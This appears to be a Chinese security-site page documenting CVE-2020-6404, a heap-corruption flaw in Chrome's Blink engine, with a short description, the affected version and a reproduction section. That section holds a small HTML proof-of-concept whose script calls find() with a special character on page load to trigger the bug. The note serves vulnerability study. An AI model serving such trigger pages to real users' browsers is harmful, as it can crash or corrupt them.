menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-6404)Google Chrome Blink 缓冲区错误漏洞 chevron_right (CVE-2020-6404)Google Chrome Blink 缓冲区错误漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-6404)Google Chrome Blink 缓冲区错误漏洞.md
    741 B / 2021-07-15 19:53:32
        (CVE-2020-6404)Google Chrome Blink 缓冲区错误漏洞
    ===================================================
    
    一、漏洞简介
    ------------
    
    在80.0.3987.87之前的Google
    Chrome中,Blink中的不当实现使远程攻击者有可能通过精心制作的HTML页面利用堆破坏。
    
    二、漏洞影响
    ------------
    
    Google Chrome 80.0.3987.87
    
    三、复现过程
    ------------
    
    ### poc
    
        <!DOCTYPE html>
        <head>
        <script type="text/javascript">
        document.addEventListener("DOMContentLoaded", function(){
        find(decodeURIComponent('\uFFFC'));
        });
        </script>
        </head>
        <body>
        <legend></legend>
        </body>
        </html>
    
    ![](./resource/(CVE-2020-6404)GoogleChromeBlink缓冲区错误漏洞/media/rId25.png)
    
    
    links
    file_download